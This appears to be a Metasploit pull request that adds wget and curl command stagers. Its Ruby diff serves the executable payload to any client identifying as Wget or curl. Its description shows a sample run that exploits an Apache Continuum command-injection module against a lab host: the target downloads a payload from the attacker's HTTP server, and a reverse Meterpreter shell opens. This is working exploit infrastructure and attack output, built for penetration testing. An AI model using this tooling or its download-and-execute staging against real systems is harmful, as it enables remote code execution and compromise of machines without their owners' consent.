### PR TITLE
Add HTTP CmdStagers (curl and wget)

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -250,7 +250,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.4)
+    rex-exploitation (0.1.7)
       jsobfu
       metasm
       rex-arch

--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -1,8 +1,7 @@
 # -*- coding: binary -*-
 
 require 'rex/exploitation/cmdstager'
-require 'msf/core/exploit/exe'
-require 'msf/base/config'
+require 'msf/core/exploit/cmdstager/http'
 
 module Msf
 
@@ -10,6 +9,7 @@ module Msf
 module Exploit::CmdStager
 
   include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager::Http
 
   # Constant for stagers - used when creating an stager instance.
   STAGERS = {
@@ -21,7 +21,9 @@ module Exploit::CmdStager
     :vbs => Rex::Exploitation::CmdStagerVBS,
     :vbs_adodb => Rex::Exploitation::CmdStagerVBS,
     :certutil => Rex::Exploitation::CmdStagerCertutil,
-    :tftp => Rex::Exploitation::CmdStagerTFTP
+    :tftp => Rex::Exploitation::CmdStagerTFTP,
+    :wget => Rex::Exploitation::CmdStagerWget,
+    :curl => Rex::Exploitation::CmdStagerCurl
   }
 
   # Constant for decoders - used when checking the default flavor decoder.
@@ -124,6 +126,11 @@ module Exploit::CmdStager
     end
 
     self.stager_instance = create_stager
+
+    if stager_instance.respond_to?(:http?) && stager_instance.http?
+      opts[:payload_uri] = start_service(opts)
+    end
+
     cmd_list = stager_instance.generate(opts_with_decoder(opts))
 
     if cmd_list.nil? || cmd_list.length.zero?

--- a/lib/msf/core/exploit/cmdstager/http.rb
+++ b/lib/msf/core/exploit/cmdstager/http.rb
@@ -1,0 +1,49 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/tcp_server'
+require 'msf/core/exploit/http/server'
+
+module Msf::Exploit::CmdStager
+module Http
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Stance' => Msf::Exploit::Stance::Aggressive
+    ))
+  end
+
+  def start_service(opts = {})
+    if opts[:busybox] && (ssl = datastore['SSL'])
+      datastore['SSL'] = false
+    end
+
+    super
+    payload_uri = get_uri
+
+    if ssl
+      datastore['SSL'] = true
+    end
+
+    payload_uri
+  end
+
+  def resource_uri
+    if (datastore['URIPATH'] || '').end_with?(?/)
+      random_uri
+    else
+      super
+    end
+  end
+
+  def on_request_uri(cli, request)
+    if request['User-Agent'] =~ /^(?:Wget|curl)/
+      send_response(cli, exe)
+    else
+      send_not_found(cli)
+    end
+  end
+
+end
+end

--- a/lib/msf/core/exploit/cmdstager/http.rb
+++ b/lib/msf/core/exploit/cmdstager/http.rb
@@ -15,26 +15,15 @@ module Http
   end
 
   def start_service(opts = {})
-    if opts[:busybox] && (ssl = datastore['SSL'])
-      datastore['SSL'] = false
-    end
+    datastore_ssl = datastore['SSL']
+    datastore['SSL'] = !!opts[:ssl]
 
     super
-    payload_uri = get_uri
 
-    if ssl
-      datastore['SSL'] = true
-    end
+    payload_uri = get_uri
+    datastore['SSL'] = datastore_ssl
 
     payload_uri
-  end
-
-  def resource_uri
-    if (datastore['URIPATH'] || '').end_with?(?/)
-      random_uri
-    else
-      super
-    end
   end
 
   def on_request_uri(cli, request)


### PR DESCRIPTION
**Feature description:**

This adds two new ```CmdStager``` flavors: ```wget``` and ```curl```.

**Verification steps:**

- [x] Land https://github.com/rapid7/rex-exploitation/pull/5
- [x] ```use``` a ```CmdStager``` module that doesn't override ```CMDSTAGER::FLAVOR```
- [x] ```set CMDSTAGER::FLAVOR wget``` or ```curl```
- [x] ```run```
- [x] 🐚?

**Sample run:**

```
msf > use exploit/linux/http/apache_continuum_cmd_exec 
msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.134
rhost => 192.168.33.134
msf exploit(apache_continuum_cmd_exec) > set payload linux/x64/mettle_reverse_tcp
payload => linux/x64/mettle_reverse_tcp
msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget 
cmdstager::flavor => wget
msf exploit(apache_continuum_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Injecting CmdStager payload...
[*] Using URL: http://0.0.0.0:8080/Ttnem26W
[*] Local IP: http://192.168.1.3:8080/Ttnem26W
[*] Command Stager progress -  50.46% done (55/109 bytes)
[*] Command Stager progress -  70.64% done (77/109 bytes)
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.134:37211) at 2016-12-30 00:31:07 -0600
[*] Command Stager progress -  82.57% done (90/109 bytes)
[*] Command Stager progress - 100.00% done (109/109 bytes)
[*] Server stopped.

meterpreter > 
```

I've wanted to see this implemented for a long, long time now...

For #7626. I haven't tested it with that module yet. cc @todb-r7